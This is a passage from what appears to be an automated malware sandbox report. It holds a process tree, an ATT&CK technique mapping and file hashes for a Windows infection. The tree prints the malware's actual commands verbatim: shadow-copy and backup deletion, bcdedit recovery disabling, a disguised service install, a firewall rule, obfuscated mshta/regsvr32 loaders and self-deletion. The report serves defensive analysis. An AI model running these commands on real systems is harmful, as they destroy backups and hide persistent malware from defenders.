                                                                                                                        "C:\Users\Admin\AppData\Local\10fa34dc-e975-44e6-a940-a0e4846f7cc4\build2.exe"
                                                                                                                        5⤵
                                                                                                                          PID:3068
                                                                                                                          • C:\Users\Admin\AppData\Local\10fa34dc-e975-44e6-a940-a0e4846f7cc4\build2.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\10fa34dc-e975-44e6-a940-a0e4846f7cc4\build2.exe"
                                                                                                                            6⤵
                                                                                                                              PID:2436
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\10fa34dc-e975-44e6-a940-a0e4846f7cc4\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                7⤵
                                                                                                                                  PID:2368
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                    8⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:2884
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    8⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:852
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4FB8.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4FB8.exe
                                                                                                                      1⤵
                                                                                                                        PID:3020
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4FE8.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4FE8.exe
                                                                                                                        1⤵
                                                                                                                          PID:2536
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 4FE8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4FE8.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            2⤵
                                                                                                                              PID:2888
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im 4FE8.exe /f
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:1340
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                3⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:2392
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5E5A.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5E5A.exe
                                                                                                                            1⤵
                                                                                                                              PID:2556
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5E5A.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5E5A.exe
                                                                                                                                2⤵
                                                                                                                                  PID:2744
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8BFF.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8BFF.exe
                                                                                                                                1⤵
                                                                                                                                  PID:2812
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C874.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C874.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:2444
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E23B.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E23B.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:2792
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F291.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F291.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:1556
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2348
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F291.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\F291.exe" -agent 0
                                                                                                                                          2⤵
                                                                                                                                            PID:2780
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                            2⤵
                                                                                                                                              PID:2636
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                              2⤵
                                                                                                                                                PID:2352
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                2⤵
                                                                                                                                                  PID:852
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1636
                                                                                                                                                  • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                    notepad.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2520
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\571E.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\571E.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2444
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\66A9.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\66A9.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1604
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yntqldpq\
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2984
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\implxgdz.exe" C:\Windows\SysWOW64\yntqldpq\
                                                                                                                                                            2⤵
                                                                                                                                                              PID:660
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              "C:\Windows\System32\sc.exe" create yntqldpq binPath= "C:\Windows\SysWOW64\yntqldpq\implxgdz.exe /d\"C:\Users\Admin\AppData\Local\Temp\66A9.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2248
                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                "C:\Windows\System32\sc.exe" description yntqldpq "wifi internet conection"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2068
                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                  "C:\Windows\System32\sc.exe" start yntqldpq
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2428
                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1580
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2264
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:944
                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2128
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3012
                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2004
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2288
                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                vssadmin delete shadows /all /quiet
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                PID:2484
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:996
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:2344
                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2184
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D4E7.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D4E7.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2392
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D1AD.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D1AD.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1792
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D1AD.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D1AD.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2064
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D1AD.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\D1AD.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1936
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D1AD.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\D1AD.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2872
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\897f408a-c6d4-4144-b66b-60e2219a40df\build2.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\897f408a-c6d4-4144-b66b-60e2219a40df\build2.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2712
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\897f408a-c6d4-4144-b66b-60e2219a40df\build2.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\897f408a-c6d4-4144-b66b-60e2219a40df\build2.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:1556
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\897f408a-c6d4-4144-b66b-60e2219a40df\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:1676
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:2572
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:2304
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E08D.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E08D.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1816
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\0685.bat" "
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2848
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F46B.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F46B.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1672
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vBscRipt: ClOse ( CReateObjEct ( "WsCriPT.SHelL" ). RUN ( "C:\Windows\system32\cmd.exe /c COPy /Y ""C:\Users\Admin\AppData\Local\Temp\F46B.exe"" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF """" == """" for %U IN ( ""C:\Users\Admin\AppData\Local\Temp\F46B.exe"" ) do taskkill /f -Im ""%~NxU"" " , 0, TRue ) )
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1064
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c COPy /Y "C:\Users\Admin\AppData\Local\Temp\F46B.exe" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF "" == "" for %U IN ( "C:\Users\Admin\AppData\Local\Temp\F46B.exe" ) do taskkill /f -Im "%~NxU"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:2880
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /f -Im "F46B.exe"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:2084
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe
                                                                                                                                                                                                                      ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2020
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBscRipt: ClOse ( CReateObjEct ( "WsCriPT.SHelL" ). RUN ( "C:\Windows\system32\cmd.exe /c COPy /Y ""C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe"" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF ""/pcloSjrIsE8gkVnrJWyyJCDe8 "" == """" for %U IN ( ""C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe"" ) do taskkill /f -Im ""%~NxU"" " , 0, TRue ) )
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:2836
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c COPy /Y "C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe" ..\NLys4I2S6W1ZR1.exe && stArt ..\NLyS4i2S6W1ZR1.exe /pcloSjrIsE8gkVnrJWyyJCDe8 & IF "/pcloSjrIsE8gkVnrJWyyJCDe8 " == "" for %U IN ( "C:\Users\Admin\AppData\Local\Temp\NLys4I2S6W1ZR1.exe" ) do taskkill /f -Im "%~NxU"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:840
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIpt: CloSE( crEatEObjeCt( "wScRiPt.ShELl" ).RUn ( "C:\Windows\system32\cmd.exe /Q /C EchO XlC:\Users\Admin\AppData\Local\Tempw> HQTV.EH &ecHO | SET /p = ""MZ"" > 7rHb.RV5 & cOPY /Y /b 7RhB.RV5 + ~FwZLB7.9 + DTGLKO.TO+ 2N3OKV.k + XVBa.6f +NXQTswCP.WJN + HqTv.EH ..\RKRK.tb & sTART regsvr32.exe -S ..\RKRK.tB /u& deL /Q * " , 0 , tRuE ) )
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:2652
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /Q /C EchO XlC:\Users\Admin\AppData\Local\Tempw> HQTV.EH &ecHO | SET /p = "MZ" > 7rHb.RV5 & cOPY /Y /b 7RhB.RV5 + ~FwZLB7.9 + DTGLKO.TO+ 2N3OKV.k +XVBa.6f +NXQTswCP.WJN + HqTv.EH ..\RKRK.tb & sTART regsvr32.exe -S ..\RKRK.tB /u& deL /Q *
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:2784
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>7rHb.RV5"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:1624
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                      regsvr32.exe -S ..\RKRK.tB /u
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:1816
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:580
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2ED.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2ED.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2996
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 2ED.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2ED.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:2684
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill /im 2ED.exe /f
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:2700
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                      PID:2140
                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "2003174458-1869338740-1007829730-109044567420321235691843500452-1490967973-1846935101"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:1624
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3093.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3093.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2968
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\regsvr32.exe" .\j~jW~Hz.C9 /u -S
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:968

                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                      File Deletion

                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                      T1107

                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                      Impact

                                                                                                                                                                                                                                      Inhibit System Recovery

                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                      T1490

                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libcurl.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libcurlpp.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libstdc++-6.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libwinpthread-1.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

